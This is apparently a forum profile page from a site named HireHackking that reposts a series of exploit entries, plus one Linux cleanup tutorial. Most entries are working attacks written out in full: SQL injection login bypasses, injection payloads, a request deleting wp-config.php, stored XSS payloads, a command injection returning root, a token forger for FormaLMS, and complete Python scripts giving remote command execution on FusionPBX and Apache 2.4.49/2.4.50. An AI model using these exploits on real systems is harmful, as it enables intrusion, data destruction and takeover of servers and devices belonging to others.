Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Money Transfer Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass # Date: 2021-11-07 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html # Version: 1.0 # Tested on: Windows 10 # Admin panel authentication bypass Admin panel authentication can be bypassed due to a SQL injection in the login form: Request: Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/mtms/admin/login.php Content-Length: 37 Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3 Connection: keep-alive username='=''or'&password='=''or' PoC: curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php
  2. HireHackking

    Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated) # Google Dork: intitle: "Inicio de Sesión - Kmaleon" # Date: 2021-11-05 # Exploit Author: Amel BOUZIANE-LEBLOND # Vendor Homepage: https://www.levelprograms.com # Software Link: https://www.levelprograms.com/kmaleon-abogados/ # Version: v1.1.0.205 # Tested on: Linux # Description: # The Kmaleon application from levelprogram is vulnerable to # SQL injection via the 'tipocomb' parameter on the kmaleonW.php ==================== 1. SQLi ==================== http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true The 'tipocomb' parameter is vulnerable to SQL injection. GET parameter 'tipocomb' is vulnerable. --- Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.0
  3. HireHackking

    WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion # Date: 11/07/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.miniorange.com/ # Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/ # Version: 1.0.3 # Tested on : Windows 10 #Poc: ----------------------------------REQUEST--------------------------------------- POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 155 Origin: http://localhost Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce ---------------------------------------------------------------------------------- -------------------------------RESPONSE------------------------------------------- HTTP/1.1 200 OK Date: Sun, 07 Nov 2021 13:19:38 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 X-Powered-By: PHP/8.0.7 Access-Control-Allow-Origin: http://localhost Access-Control-Allow-Credentials: true X-Robots-Tag: noindex X-Content-Type-Options: nosniff Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Content-Length: 9 Connection: close Content-Type: application/json; charset=UTF-8 "success" ----------------------------------------------------------------------------------
  4. HireHackking

    zlog 1.2.15 - Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: zlog 1.2.15 - Buffer Overflow # Date: 10/23/2021 # Exploit Author: LIWEI # Vendor Homepage: https://github.com/HardySimpson/zlog # Software Link: https://github.com/HardySimpson/zlog # Version: v1.2.15 # Tested on: ubuntu 18.04.2 # 1.- compile the zlogv1.2.15 code to a library. # 2.- Use the "zlog_init" API to parse a file. You can do it as my testcase below. # 3.- crash. because it made a stack-buffer-overflow READ. # 4. -Also, you can get a stack-buffer-overflow WRITE when the pointer's address which overflow read is end with "0x20". # 5.- Here are the crash backtrace. #0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15 #1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7 #2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18 #3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6 #4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18 And also my testcase: #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include "zlog.h" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { char filename[256]; sprintf(filename, "/tmp/libfuzzer.%d", getpid()); FILE *fp = fopen(filename, "wb"); if (!fp) return 0; fwrite(data, size, 1, fp); fclose(fp); int rc = zlog_init(filename); if (rc == 0) { zlog_fini(); } unlink(filename); remove(filename); return 0; } Put my testcase in his project and change the compile line with CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++" Use ./configure under his project as shown in his README.txt. you will get a binary as testcase's name. run and you will reproduce it.
  5. HireHackking

    Title: Kali Linux garbage cleaning tool

    HireHackking posted a blog entry in Hacker Technology
    stacer is a graphical garbage cleaning and system management tool. There are process management, startup item management, visual software installation and uninstallation. It is very friendly for novices who are not familiar with Linux commands. Installation apt-get install stacer Colorful dashboard Visible garbage scanning Process Management Start-up Management Visualization software uninstall System source management Use commands to clean up garbage Uninstall the software apt-get remove package-name apt-get purge package-nameremove will delete the package, but will retain the configuration file. purge will delete both the package and the configuration file. Find out which packages on the system have left the residual configuration files dpkg --list | grep '^rc' The rc in the first column means that the package has been deleted (Remove), but the configuration file (Config-file) is still there. Now extract the names of these packages. dpkg --list | grep '^rc' | cut -d ' ' -f 3 Delete these packages dpkg --list | grep '^rc' | cut -d ' ' -f 3 | xargs sudo dpkg --purge If you only want to delete the configuration file of a certain software package, you can use the following command sudo dpkg --purge package-name Delete useless deb software installation package sudo apt-get clean sudo apt-get autoclean Delete orphan packages Sometimes, when you install a software package with apt-get, other dependencies will be automatically installed. When you delete this package, these dependencies are useless. These useless dependency packages are called orphan software packages, which can be deleted using the following command apt-get autoremove Clean log files The log file will become larger and larger, and we can use the ncdu tool to view large log files. apt-get install ncdu sudo ncdu /var/log Of course, using ncdu tool can easily complete the inspection of large files.
  6. HireHackking

    Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS) # Date: 09/11/2021 # Exploit Author: Ragavender A G # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip # Version: v1.0 # Tested on: Windows 10 *Exploit:* 1. Navigate to the URL, http://localhost/edtms/edtms/admin/?page=maintenance 2. Add New department with the following value: - Name: *<svg/onload=alert(1)>* 3. Save the Department and refresh the page, which should trigger the payload. *PoC:* POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/edtms/edtms/admin/?page=maintenance Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3 id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1
  7. HireHackking

    FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated) # Date: 11/08/2021 # Exploit Author: Luska # Vendor Homepage: https://www.fusionpbx.com/ # Software Link: https://github.com/fusionpbx/fusionpbx # Version: < 4.5.30 # Tested on: Debian # CVE : CVE-2021-43405 #!/usr/bin/python3 import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import argparse cookies = {'PHPSESSID': '31337'} proxy = {'http': 'http://127.0.0.1:8080'} def login(url, username, password): data = { 'username': username, 'password': password } r = requests.post(url + '/core/user_settings/user_dashboard.php', data=data, cookies=cookies) return r.status_code def exploit_request(url, cmd): print('[+] Sending Exploit Request') mp_encoder = MultipartEncoder(fields={ 'fax_subject': '1337', 'fax_extension': f';{cmd} #', 'action': 'send', 'submit': 'send' }) r = requests.post(url + '/app/fax/fax_send.php', cookies=cookies, headers={'Content-Type': mp_encoder.content_type}, data=mp_encoder, proxies=proxy) return r.status_code def exploit(url, username, password, cmd): if login(url,username,password) == 200: print('[+] Login Successful') exploit_request(url, cmd) print('[+] Exploit Sucessful') else: print('[-] Login Failed') if __name__ == '__main__': parser = argparse.ArgumentParser(description='[*] FusionPBX < 4.5.30 Remote Code Execution | CVE-2021-43405') parser.add_argument('-t', metavar='<target/host URL>', help='Target/host URL, example: http://127.0.0.1', required=True) parser.add_argument('-u', metavar='<user>', help='User to login', required=True) parser.add_argument('-p', metavar='<password>', help='User\'s password', required=True) parser.add_argument('-c', metavar='<cmd>', help='Command to be executed', required=True) args = parser.parse_args() target = args.t user = args.u password = args.p cmd = args.c exploit(target, user, password, cmd)
  8. HireHackking

    Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS) # Date: 10.11.2021 # Exploit Author: İlhami Selamet # Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code # Version: v1.0 # Tested on: Kali Linux + XAMPP v8.0.12 Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability. Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department Step 1 - Click on the 'Create New' button for adding a new department. Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script> Step 3 - Save the department. The stored XSS triggers for all users that navigate to the 'Department List' page. PoC POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888 Content-Length: 555 Origin: http://localhost Connection: close Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54 -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="id" -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="name" <script>alert(document.cookie);</script> -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="description" desc -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="status" 1 -----------------------------407760789114464123714007564888--
  9. HireHackking

    AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-10 # Vendor Homepage: https://www.celestialsoftware.net/ # Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe # Tested Version: 11.24 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC) # Steps to reproduce: # 1. - Download and install AbsoluteTelnet # 2. - Run the python script and it will create exploit.txt file. # 3. - Open AbsoluteTelnet 11.24 # 4. - "new connection file -> Connection -> SSH1 & SSH2" # 5. - Paste the characters of txt file to "Authentication -> Username" # 6. - press "ok" button # 7. - Crashed # 8. - Reopen AbsoluteTelnet 11.24 # 9. - Copy the same characters to "Your Email Address (optional)" # 10.- Click "Send Error Report" button # 11.- Crashed #!/usr/bin/python exploit = 'A' * 1000 try: file = open("exploit.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")
  10. HireHackking

    YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated) # Date: 11-10-2021 # Exploit Author: tahaafarooq # Vendor Homepage: https://www.yealink.com/ # Version: 53.84.0.15 # Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone) Description: Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection POC: POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 49 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://xxx.xxx.xxx.xxx Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: JSESSIONID=9a83d24461329a130 Connection: close cmd=; id;&token=1714636915c6acea98 ------------------------------------------------- HTTP/1.1 200 OK Content-Type: text/html Connection: close Date: Wed, 10 Nov 2021 14:20:23 GMT Server: embed httpd Content-Length: 82 <html> <body> <div id="_RES_INFO_"> uid=0(root) gid=0(root) </div> </body> </html>
  11. HireHackking

    Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) # Date: 11/11/2021 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://apache.org/ # Version: Apache 2.4.49/2.4.50 (CGI enabled) # Tested on: Debian GNU/Linux # CVE : CVE-2021-41773 / CVE-2021-42013 # Credits : Lucas Schnell #!/usr/bin/env python3 #coding: utf-8 import os import re import sys import time import requests from colorama import Fore,Style header = '''\033[1;91m ▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████ ▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀ ▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███ ░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄ ▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░ ▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ ''' + Style.RESET_ALL if len(sys.argv) < 2 : print( 'Use: python3 file.py ip:port ' ) sys.exit() def end(): print("\t\033[1;91m[!] Bye bye !") time.sleep(0.5) sys.exit(1) def commands(url,command,session): directory = mute_command(url,'pwd') user = mute_command(url,'whoami') hostname = mute_command(url,'hostname') advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)') command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}") command = f"echo; {command};" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text print(output) if 'clear' in command: os.system('/usr/bin/clear') print(header) if 'exit' in command: end() def mute_command(url,command): session = requests.Session() req = requests.Request('POST', url=url, data=f"echo; {command}") prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) return response.text.strip() def exploitRCE(payload): s = requests.Session() try: host = sys.argv[1] if 'http' not in host: url = 'http://'+ host + payload else: url = host + payload session = requests.Session() command = "echo; id" req = requests.Request('POST', url=url, data=command) prepare = req.prepare() prepare.url = url response = session.send(prepare, timeout=5) output = response.text if "uid" in output: choice = "Y" print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host) print("[!] Sortie:\n\n" + Fore.YELLOW + output ) choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ") if choice.lower() in ['','y','yes']: while True: commands(url,command,session) else: end() else : print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host) except KeyboardInterrupt: end() def main(): try: apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' payloads = [apache2449_payload,apache2450_payload] choice = len(payloads) + 1 print(header) print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE") while choice >= len(payloads) and choice >= 0: choice = int(input('[~] Choice : ')) if choice < len(payloads): exploitRCE(payloads[choice]) except KeyboardInterrupt: print("\n\033[1;91m[!] Bye bye !") time.sleep(0.5) sys.exit(1) if __name__ == '__main__': main()
  12. HireHackking

    AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-10 # Vendor Homepage: https://www.celestialsoftware.net/ # Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe # Tested Version: 11.24 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC) # Steps to reproduce: # 1. - Download and install AbsoluteTelnet # 2. - Run the python script and it will create exploit.txt file. # 3. - Open AbsoluteTelnet 11.24 # 4. - "new connection file -> DialUp Connection # 5. - Paste the characters of txt file to "DialUp -> phone" # 6. - press "ok" button # 7. - Crashed # 8. - Reopen AbsoluteTelnet 11.24 # 9. - Copy the same characters to "license name" # 10.- Click "Send Error Report" button # 11.- Crashed #!/usr/bin/python exploit = 'A' * 1000 try: file = open("exploit.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")
  13. HireHackking

    FormaLMS 2.4.4 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FormaLMS 2.4.4 - Authentication Bypass # Google Dork: inurl:index.php?r=adm/ # Date: 2021-11-10 # Exploit Author: Cristian 'void' Giustini @ Hacktive Security # Vendor Homepage: https://formalms.org # Software Link: https://formalms.org # Version: <= 2.4.4 # Tested on: Linux # CVE : CVE-2021-43136 # Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform. # Analysis: https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/ # Nuclei template: https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml #!/usr/bin/env python """ The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled """ import sys import time import hashlib secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c" def help(): print(f"Usage: {sys.argv[0]} username target_url") sys.exit() if len(sys.argv) < 3: help() user, url = (sys.argv[1], sys.argv[2]) t = str(int(time.time()) + 5000) token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper() final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}" print(f"URL with default secret: {final_url}") token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper() final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}" print(f"URL with empty secret: {final_url}")
  14. HireHackking

    WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS) # Date: 11/11/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: http://www.wpsymposiumpro.com/ # Software Link: https://wordpress.org/plugins/wp-symposium-pro/ # Version: 2021.10 # Tested on : Windows 10 #Description: WP Symposium Pro version 2021.10 plugin was exposed to stored cross site scripting vulnerability due to lack of sanitizing adding forum speciality and its "name" label. #Poc: POST /wordpress/wp-admin/admin.php?page=wps_pro_setup HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page=wps_pro_setup Content-Type: application/x-www-form-urlencoded Content-Length: 129 Origin: http://localhost Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Ca0ec8384ede32940d2b69f1082cc013aecf3e887a70485cb38229a405be8a12d; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636654062; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636828443%7CvIYW2N7MvOinijMOx1nLkLNysDvFz33pkuJcGyuQq56%7Cd9daf69cf25e68a3ed54d94c4baa78d20f9772e986211e25656dd832aac6e544 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 wpspro_quick_start=forum&wps_admin_forum_add_name=%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&wps_admin_forum_add_description=test ---------------------------------------------------------------------------------- ## After adding new forum, click created forum and pop-up will be on the screen.
  15. HireHackking

    WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS) # Date: 11/12/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://wordpress.org/plugins/accesspress-social-icons/ # Version: 1.8.2 # Tested on : Windows 10 #Poc: 1. Install Latest WordPress 2. Install and activate AccessPress Social Icons 1.8.2 3. Open plugin on the left frame and keep going "add new" field. Click "Choose icon indiviually" and fill other fields. 4. Enter JavaScript payload which is mentioned below into 'icon title' field and "Add Icon to list". <img src=x onerror=confirm('xss')> 4. You will observe that the payload successfully got stored into the database and alert will be seen on the screen.
  16. HireHackking

    Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation # Date: 11/11/2021 # Exploit Author: it # Vendor Homepage: https://www.microsoft.com # Software Link: https://www.microsoft.com/pt-br/download/details.aspx?id=8518 # Version: Version 6.1 Compilation 7601 Service Pack 1 # Tested on: Microsoft Windows MultiPoint Server 2011 - English Version Description Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Vulnerable: |Service Local Privilege Escalation - Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnscache Vulnerability Type: Privilege Escalation Tested on: Microsoft Windows MultiPoint Server 2011 - Version 6.1 Compilation 7601 Service Pack 1 Language OS: English The Vulnerability Clément wrote a very useful permissions-checking tool for Windows that find various misconfigurations in Windows that could allow a local attacker to elevate their privileges. On a typical Windows 7 and Server 2008 R2 machine, the tool found that all local users have write permissions on two registry keys: HKLM\SYSTEM\CurrentControlSet\Services\Dnscache HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper These didn't immediately seem exploitable, but Clément did the legwork and found the Windows Performance Monitoring mechanism can be made to read from these keys - and eventually load the DLL provided by the local attacker. To most everyone's surprise, not as the local user, but as Local System. In short, a local non-admin user on the computer just creates a Performance subkey in one of the above keys, populates it with some values, and triggers performance monitoring, which leads to a Local System WmiPrvSE.exe process loading attacker's DLL and executing code from it. About Artiche: https://itm4n.github.io/windows-registry-rpceptmapper-eop/ I detected that in another version of windows it is also vulnerable, Windows Multipoint 2011, which can affect customers who use extended license; I can't say if there are any other vulnerable unpublished versions besides the ones I've posted here How to Produce Exploitation Compile Exploit Perfusion in Visual Studio 2019 - Open Project, Make Release x64 and Compile. Is necessary install microsoft visual c++ redistributable on Windows MultiPoint 2011 for execute exploit The exploit Add Subkeys in HKLM\SYSTEM\CurrentControlSet\Services\Dnscache HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper\Performance Library = Name of your performance DLL Open = Name of your Open function in your DLL Collect = Name of your Collect function in your DLL Close = Name of your Close function in your DLL and Exploit Write payload dll hijacking, call dll with permission SYSTEM using WMI Tools and Exploit: https://github.com/itm4n/PrivescCheck Exploit: https://github.com/itm4n/Perfusion
  17. HireHackking

    Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)

    HireHackking posted a blog entry in Hacker Technology
